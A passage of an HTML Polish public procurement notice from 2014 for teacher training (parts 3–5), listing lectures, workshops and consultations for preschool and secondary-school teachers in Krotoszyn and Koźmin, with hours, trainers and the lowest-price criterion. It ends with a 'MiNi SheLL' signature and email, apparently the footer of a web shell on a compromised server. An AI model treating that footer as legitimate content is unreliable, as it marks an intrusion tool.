3)	Poszerzenie kompetencji nauczycieli w obszarze stosowania informacji zwrotnej w ocenianiu oraz komunikacji z rodzicami uczniów. Zaznajomienie n-la ze sposobami formułowania IZ adresowanej do ucznia w taki sposób, by motywowała ona ucznia do pracy i przyniosła obustronne korzyści. Prowokowanie ucznia do samooceny i autorefleksji jako sposobu na zwiększenie świadomości dot. własnych osiągnięć edukacyjnych.

Konsultacje: 6 godz. 
Terminy: marzec kwiecień 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3
 Budowa koncepcji pracy przedszkola..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3
 Budowa koncepcji pracy przedszkola.
 Odbiorcy - nauczyciele Przedszkola nr 5 w Krotoszynie 
Liczba nauczycieli: 10 
Terminy realizacji wykładów i warsztatów: 
29, 30.01.2014 r. (I tura)
17, 18.02.2014 r. (II tura)
SORE: Irena Grobelna 

Wykłady: 6 godz. 
1)	Metody i formy pracy z dziećmi w wieku przedszkolnym.
- zaprezentowanie nowości (3h)
2)	Jak efektywnie rozwijać współpracę z rodzicami i środowiskiem lokalnym (położenie nacisku na środowisko) (3h)

Warsztaty: 15 godz.
1)	Metody i formy pracy w edukacji umysłowej logiczne myślenie,rozwijanie mowy, praca metodą projektu (5h)
2)	Wzorcowe ułożenie koncepcji pracy przedszkola (5h)
3)	Model absolwenta - jak osiągnąć założony, wzorcowy rezultat (5h)

Konsultacje grupowe: 6 godz. 
Terminy: marzec kwiecień 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4

Oferta edukacyjna drogą do właściwej realizacji podstawy programowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4

Oferta edukacyjna drogą do właściwej realizacji podstawy programowej
Odbiorcy nauczyciele Przedszkola nr 6 z Oddziałami Integracyjnymi w Krotoszynie 
Liczba nauczycieli: 13 
Terminy realizacji wykładów i warsztatów: 
09, 10.01.2014 r. (I tura) 
20, 21.02.2014 r. (II tura)
SORE; Joanna Rogowska-Sroka 

Wykłady: 6 godz. 
1)	Innowacje pedagogiczne jako ciekawy sposób na realizację podstawy programowej. 
	Aspekty prawne tworzenia innowacji pedagogicznych zgodnych z podstawą programową i 	procedura uzyskania wpisu do rejestru i akceptacji KO (2h)
2)	Umiejętność poprawnego tworzenia innowacji pedagogicznych zgodnych z podstawą programową - jej części składowe, pułapki i najczęstsze błędy (2h)
3)	Etapy, procedury wdrażania innowacji pedagogicznych w przedszkolu z oddziałami integracyjnymi (2h)

Warsztaty: 15 godz. 
1)	Jak wybrać obszar do wprowadzenia innowacji pedagogicznej zgodnej z podstawą programową? - metody i narzędzia do diagnozy (2h)
2)	Przegląd przykładowych innowacji pedagogicznych realizowanych w przedszkolach, w tym również w przedszkolach z oddziałami integracyjnymi (1h)
3)	Tworzenie własnej innowacji pedagogicznej zgodnej z podstawą programową i zdiagnozowanymi potrzebami przedszkola z oddziałami integracyjnymi. (10h)
4)	Jak poprawnie przeprowadzić ewaluację opracowanej innowacji pedagogicznej w przedszkolu z oddziałami integracyjnymi? (2h)

Konsultacje grupowe: 6 godz. 
Terminy: marzec kwiecień 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5

Szkoła promuje wartość edukacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5

Szkoła promuje wartość edukacji
Odbiorcy - nauczyciele I Liceum Ogólnokształcącego im. Powstańców Wlkp. w Koźminie Wlkp. 
Liczba nauczycieli: 16 
Terminy realizacji wykładów i warsztatów: 
30, 31.01.2014 r. (I tura)
20, 21.02.2014 r. (II tura) 
SORE: Sylwia Minta 

Wykłady: 6 godz. 
1)	budowanie pozytywnego wizerunku i tożsamości szkoły (logo, strona internetowa, media relations),
2)	promowanie wartości edukacji i potrzeby uczenia się w środowisku własnym i lokalnym,
3)	pozyskiwanie sponsorów na realizację działań promocyjnych,
4)	działania informacyjne i public relations w praktyce szkoły (6h)

Warsztaty: 15 godz. 
1)	analiza form promowania szkoły i ich skuteczność, metody zainteresowania szkołą i jej ofertą edukacyjną uczniów i rodziców, efektywna prezentacja szkoły na targach edukacyjnych, jak radzić sobie z negatywnymi opiniami na temat szkoły, jak zmienić stereotypy i opinie na temat szkoły (5h)
2)	kampania wizerunkowo-medialna szkoły - planowanie, wdrażanie, monitoring i ewaluacja kolejnych etapów (5h)
3)	strategie i formy współpracy z rodzicami i środowiskiem lokalnym oraz instytucjami w celu propagowania edukacji oraz promocji szkoły (5h)
Konsultacje grupowe: 6 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com